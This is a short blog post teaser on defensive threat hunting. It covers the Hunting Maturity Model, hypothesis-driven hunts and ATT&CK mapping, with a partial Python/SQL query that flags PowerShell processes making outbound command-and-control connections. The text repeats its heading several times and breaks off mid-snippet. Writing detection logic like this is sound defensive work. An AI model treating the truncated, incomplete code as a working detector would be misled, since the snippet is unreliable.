DEV Community

丁久
丁久

Posted on • Originally published at dingjiu1989-hue.github.io

Threat Hunting

#devops #security #cloud

This article was originally published on AI Study Room. For the full version with working code examples and related articles, visit the original post.

Threat Hunting

Threat Hunting

Threat Hunting

Threat Hunting

Threat Hunting

Threat Hunting

Threat Hunting

Threat Hunting

Threat Hunting

Introduction

Threat hunting is the proactive search for malicious activity that evades existing security controls. Unlike automated detection, hunting is hypothesis-driven and iterative. It assumes that adversaries are already inside the network and seeks to find them before they achieve their objectives.

The Hunting Maturity Model

The Hunting Maturity Model (HMM) describes an organization's hunting capability across five levels:

  • HMM0 — Initial: Relies on automated alerts only; no proactive hunting

  • HMM1 — Minimal: IOC-based hunting using threat intelligence feeds

  • HMM2 — Procedural: Hunting follows documented procedures

  • HMM3 — Innovative: Creates novel data analysis techniques

  • HMM4 — Leading: Automates hunting at scale

Hypothesis-Driven Hunting

The hypothesis is the foundation of every hunt. It should be testable, specific, and grounded in threat intelligence or risk assessment.

Hypothesis: An adversary is using PowerShell for C2 communication

Test: Find PowerShell processes making outbound connections

def hunt_powershell_c2(time_window_hours=72):

query = f"""

SELECT p.pid, p.command_line, p.start_time,

u.username, h.dest_ip, h.dest_port

FROM processes p

JOIN users u ON p.user_id = u.id

JOIN network_connections h ON p.pid = h.pid

WHERE p.name = 'powershell.exe'

AND h.remote_port IN (80, 443, 8080)

AND p.start_time > NOW() - INTERVAL '{time_window_hours} hours'

AND p.command_line NOT LIKE '%WindowsPowerShell%'

"""

results = execute_hunt(query)

for row in results:

if suspicious_patterns.match(row.command_line):

yield HuntingFinding(

hypothesis="PowerShell C2",

evidence=row,

severity="high"

)

MITRE ATT&CK; Mapping

The MITRE ATT&CK; framework provides a common taxonomy for adversary behavior. Mapping hunts to ATT&CK; techniques ensures comprehensive coverage.

hunt:

name: "DLL Search Order Hijacking"

technique_id: T1574.001

tactic: Persistence, Privilege Escalation

d

Read the full article on AI Study Room for complete code examples, comparison tables, and related resources.

Found this useful? Check out more developer guides and tool comparisons on AI Study Room.

Top comments (0)